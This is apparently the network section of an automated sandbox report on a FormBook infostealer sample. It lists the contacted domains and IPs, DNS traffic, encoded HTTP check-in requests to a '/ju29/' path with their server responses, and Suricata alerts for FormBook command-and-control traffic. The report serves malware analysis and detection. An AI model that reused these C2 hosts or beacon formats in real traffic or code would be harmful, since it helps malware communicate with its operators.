Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.klxcv.xyz | 198.177.124.40 | |
www.merchascarpamici.com | ||
www.zg9tywlubmftzw5ldzmzmzk.com | 103.224.212.216 | |
www.jokergiftcard.buzz | ||
www.xpermate.com | 77.245.157.73 |
- UDP Requests
-
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:53673 164.124.101.2:53
-
192.168.56.103:62576 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.101:137
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:138 192.168.56.255:138
-
192.168.56.103:49154 239.255.255.250:1900
-
GET
404
http://www.klxcv.xyz/ju29/?BZR8DR=4JvfAS1R38BLVmeFk9DSiCnJ91CcqWw5bF+8iYbx752X4gk0kHBYwToCGZXoT3c/qcFpSYl1&VRKt=vBZhWH98eHJDbf
REQUEST
RESPONSE
BODY
GET /ju29/?BZR8DR=4JvfAS1R38BLVmeFk9DSiCnJ91CcqWw5bF+8iYbx752X4gk0kHBYwToCGZXoT3c/qcFpSYl1&VRKt=vBZhWH98eHJDbf HTTP/1.1
Host: www.klxcv.xyz
Connection: close
HTTP/1.1 404 Not Found
Date: Mon, 06 Nov 2023 22:49:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 275
Connection: close
Content-Type: text/html; charset=iso-8859-1
GET
301
http://www.xpermate.com/ju29/?BZR8DR=YSdUgFSDvDomRrfxRTc82IB8KvEz5Cudp7FBenL6bBiUULPv2hucH8VGw3UW6gX6WzIP7l0c&VRKt=vBZhWH98eHJDbf
REQUEST
RESPONSE
BODY
GET /ju29/?BZR8DR=YSdUgFSDvDomRrfxRTc82IB8KvEz5Cudp7FBenL6bBiUULPv2hucH8VGw3UW6gX6WzIP7l0c&VRKt=vBZhWH98eHJDbf HTTP/1.1
Host: www.xpermate.com
Connection: close
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Mon, 06 Nov 2023 22:49:42 GMT
Content-Type: text/html
Content-Length: 162
Connection: close
Location: https://xpermate.com/ju29/?BZR8DR=YSdUgFSDvDomRrfxRTc82IB8KvEz5Cudp7FBenL6bBiUULPv2hucH8VGw3UW6gX6WzIP7l0c&VRKt=vBZhWH98eHJDbf
GET
302
http://www.zg9tywlubmftzw5ldzmzmzk.com/ju29/?BZR8DR=eJVNysqPhL/uaCM5mmKlDkK99NL0wUK/QD98X4Xi+tSElCareFrH+cf4EbqdkZtA1uTt8AGh&VRKt=vBZhWH98eHJDbf
REQUEST
RESPONSE
BODY
GET /ju29/?BZR8DR=eJVNysqPhL/uaCM5mmKlDkK99NL0wUK/QD98X4Xi+tSElCareFrH+cf4EbqdkZtA1uTt8AGh&VRKt=vBZhWH98eHJDbf HTTP/1.1
Host: www.zg9tywlubmftzw5ldzmzmzk.com
Connection: close
HTTP/1.1 302 Found
date: Mon, 06 Nov 2023 22:50:03 GMT
server: Apache
set-cookie: __tad=1699311003.8705860; expires=Thu, 03-Nov-2033 22:50:03 GMT; Max-Age=315360000
location: http://ww25.zg9tywlubmftzw5ldzmzmzk.com/ju29/?BZR8DR=eJVNysqPhL/uaCM5mmKlDkK99NL0wUK/QD98X4Xi+tSElCareFrH+cf4EbqdkZtA1uTt8AGh&VRKt=vBZhWH98eHJDbf&subid1=20231107-0950-0360-94e5-cef654db2617
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49170 -> 103.224.212.216:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.103:49169 -> 77.245.157.73:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.103:49168 -> 198.177.124.40:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.103:49168 -> 198.177.124.40:80 | 2031088 | ET HUNTING Request to .XYZ Domain with Minimal Headers | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts